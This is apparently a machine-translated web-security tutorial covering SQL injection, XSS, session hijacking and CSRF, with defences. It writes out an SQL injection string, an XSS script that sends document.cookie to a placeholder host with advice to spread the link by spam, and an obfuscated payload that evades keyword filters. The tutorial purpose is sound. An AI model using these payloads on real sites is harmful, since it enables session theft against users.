XPath injection is similar to SQL injection, except the XML format where the database goes

Source: Internet
Author: User
Tags sql injection xpath wsdl

SQL injection this piece does not want to chat, I believe many friends hear the ear long cocoon, is nothing more than to submit the information containing SQL operation statements to the backend, the backend if not well filtered on the execution of the statement, the attacker can naturally arbitrarily manipulate the site database.

For example, there is a library site book.com, you click on a book details page, the URL is this:

book.com/book?id=100

This book shows that the key value in the database is 100, and the backend receives the URL parameter and executes the database query operation:

SELECT * from booktable where id= ' 100 '

So if we change the URL to

Book.com/book?id=100 ' or ' 1 ' = ' 1

Then the execution of the database operation becomes:

SELECT * from booktable where id= ' or ' 1 ' = ' 1 '

This removes all data from the entire booktable form.

XPath injection is similar to SQL injection, except that the XML format of the database goes, the attack way naturally also has to follow the syntax of XML lookup, specifically to see here.

CGI command execution refers to when a user remotely accesses a CGI script by submitting a malicious parameter that allows the server to execute the relevant CGI command to obtain information or even manipulate the server. Interested friends can look down here.

For these attacks, what we need to do is to naturally filter the submission parameters, preferably front-end filtering, and back-end filtering (back-end filtering and interception is the most important, after all, through the browser to disable the script configuration can avoid the front-end filtering).

An XSS (cross-site scripting cross-domain scripting attack) attack is also one of the most common web attacks, with a focus on "cross-domain" and "client-side execution." Let's Take That library website book.com to ridicule.

Suppose there is a place in the upper right corner of the page where you can search for a book, you could simply type in a book you don't have at all, like a "rich willful Guide", then click the "Search" button. This time the page (Book.com/search?name= Rich wayward Guide) will return a message:

The book you searched for "Rich wayward Guide" does not exist

OK, so how about we type this:

<script>alert (' No books open a knitting bookstore ') </script>

Assuming that the library site does not filter the data, and the data entered by the user is displayed intact, the returned page will naturally return the script to execute it.

But this is not good to play, since to do the attack, we have to obtain the user's data, to obtain the data naturally to send the information back to our server (assuming that the address of receiving information is Http://vajoy/get), then we can write:

<script>document.location= ' http://vajoy/get?cookie= ' +document.cookie</script>

But this is not good to play Ah, received is always our own data, we want to collect should be someone else's cookie information Ah!

For a trifle, you may wish to let others click on this address by QQ group, or by mass spam Mail:

book.com/search?name=<script>document.location= ' http://vajoy/get?cookie= ' +document.cookie</script>

This is one of the XSS attacks, called "reflected XSS"-based on the reflection of XSS attacks, mainly rely on the site server to return the script, the client triggered the execution to initiate a web attack.

Similar to the "dom-based or local XSS"-a DOM-based or local XSS attack. By analogy with the project I'm working on--free wifi for users, but a gateway with free WiFi will insert a script into any page you visit to embed a suspended ad (you can turn it off, of course), but if the script you insert is a malicious script that gets your sensitive data, it's different. The behavior of sending user information directly across domains, like this directly present on the page without having to go through the server back to script processing, is based on local XSS attacks.

There is also the last known "Stored XSS"-storage-based XSS attack. It is through the Bar Ah Blog Park Ah and other places to publish a malicious cross-domain script posts or articles, so that the malicious script stored in the inside, each access to the post/article will be the people.

Remember the alert pop-up window that started loading this article? Suppose the blog park to filter the article, all the "alert" Ah, "eval" ah and other sensitive characters are filtered out, then we how to do? We can do this:

<script type= "Text/javascript" >
var x= ' Eva ' +string.fromcharcode (108), y=window,e= ' a ' +string.fromcharcode (108) + ' ERT ("Welcome to this article");
y[x][' call '] (this,e);
</script>

So we're going to get the right pop-up window.

The prevention of XSS is also a filtering of submission data, and there is a little bit of caution in returning user-submitted content!

Session Hijacking

Baidu Encyclopedia has a very interesting citation-"in the real life, such as you go to the market to buy food, after the money you have to do some other things, wait a while to pick up the vegetables, if this time a stranger asked to take the dishes, the seller will give the dishes to strangers?" ”

This metaphor is interesting, and when we routinely access an HTTP Web site, we establish an HTTP session with its server. Suppose your "friends" in your dorm house are on the same subnet as you, and some of them want to pretend to hijack your HTTP session, then the server will take the dish, oh no, is the message back to that person?

The answer is yes, because the HTTP session is not secure. It encapsulates the transmission of data through the TCP/IP protocol, inserting a 32-bit serial number into each byte of the transmitted data, which is used to maintain the tracking data and provide reliability (serial numbers are progressively incremented in accordance with the data order). Third-party attackers can sniff the message information in the user and server communication, if he can guess the serial number in the data, it will be able to disconnect legitimate users, disguised as legitimate users to control the subsequent calls.

For the prevention of session hijacking, we can take the SSH protocol, enhance the robustness of the network security system, or use the unordered UUID instead of the serial number in the communication (instead of gradual increment).

Other attacks

Other attacks include CSRF attacks, phishing attacks, and denial of service attacks, which are not mentioned previously.

CSRF (Cross-site request forgery), translated for cross-site requests forgery, is very similar to XSS, but XSS is the use of the user's trust in the current site to launch an attack, and CSRF is to take advantage of the site to the user's trust to launch an attack.

Still take the above library site for example, if its security mechanism is lax-as long as the user login to the site, as long as the browser is not closed, in any case can be used as an authenticated user to do the purchase of books, borrowing operations (no need to re-login or enter a payment password or something, After all, you've already logged in and verified it once.

So we send a message to a user, and there's a link to the book execution page ... Oh, no, that's what we need. Users click on it, we want the user to see the time to execute the book operation, we can do this-in the mail to insert a picture:

IMG, script, IFRAME tags are not restricted by the same-origin policy, assuming that you use the mailbox is very straightforward to display this image to the user, and the user just logged in book.com and did not close the browser, the SRC connection will be immediately accessible book.com/ Pay page, and follow the authenticated case to do the book operation.

I believe now you will be very clear why the current mailbox will not directly display the picture in the mail--all for your safety considerations.

For CSRF attacks, we can do the following:

1. Check the Referer parameter in the header to ensure that the request originates from the correct website (but the XHR request can call the setRequestHeader method to modify the Referer header);

2. The user's identity needs to be re-verified for any important request;

3. Create a unique token, place it in the session of the server and the cookie of the client, and check the consistency of the two for any request.

Phishing attack refers to the forgery of the website, such as ta0bao.com, and then the use of XSS and other ways to launch attacks.

Denial of service (DoS) refers to a flood-like request to a website (traffic floor), which causes the server to overload and shut down, and the processing method is routinely a hardware and software solution with QoS (quality of service).

Attack plane

The attack plane refers to where a malicious person might start making trouble, and there are three common attack planes:

A. Traditional Web application

1. Form input (even the contents of the hidden control);

2. Cookies (The purpose of SQL injection attacks can also be achieved by modifying the cookie content);

3. Header (sometimes in order to facilitate statistical source data, the server will send the client header referer, user-agent information to the database, then by modifying the header information can also play the SQL injection tool purposes)

4. Request parameters

5. Uploading files (carrying malicious code within the file)

Two. Web Services

1. All of the above "traditional Web services" methods;

2. wsdl document (each method that exposes the server and how it is used)

Three. Ajax Applications

That is, the "one" and "two" collections

Solution Solutions

In summary, we can look at our web site in this way:

1. Never trust any information from the client, the information should be encoded or filtered first;

2. Carefully return the information entered by the user;

3. Use blacklist and whitelist processing (i.e. "What sensitive information is not allowed" or "what information is allowed only", the effect of whitelist is better but the limit is high);

4. Check and verify the source of the request, re-verify each important operation;

5. Use SSL to prevent third parties from listening to traffic (but not blocking XSS, CSRF, SQL injection attacks);

6. Do not store important files and backup files in places accessible to the public;

7. Session ID is unordered;

8. Verify the files uploaded by the user (not just for format verification, for example, a GIF image should also be converted to binary and validate its per-frame color values < unsigned 8-bit > and wide-High values < unsigned 16-bit >);

9. The WSDL document should require the user to register for access;

XPath injection is similar to SQL injection, except the XML format where the database goes

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.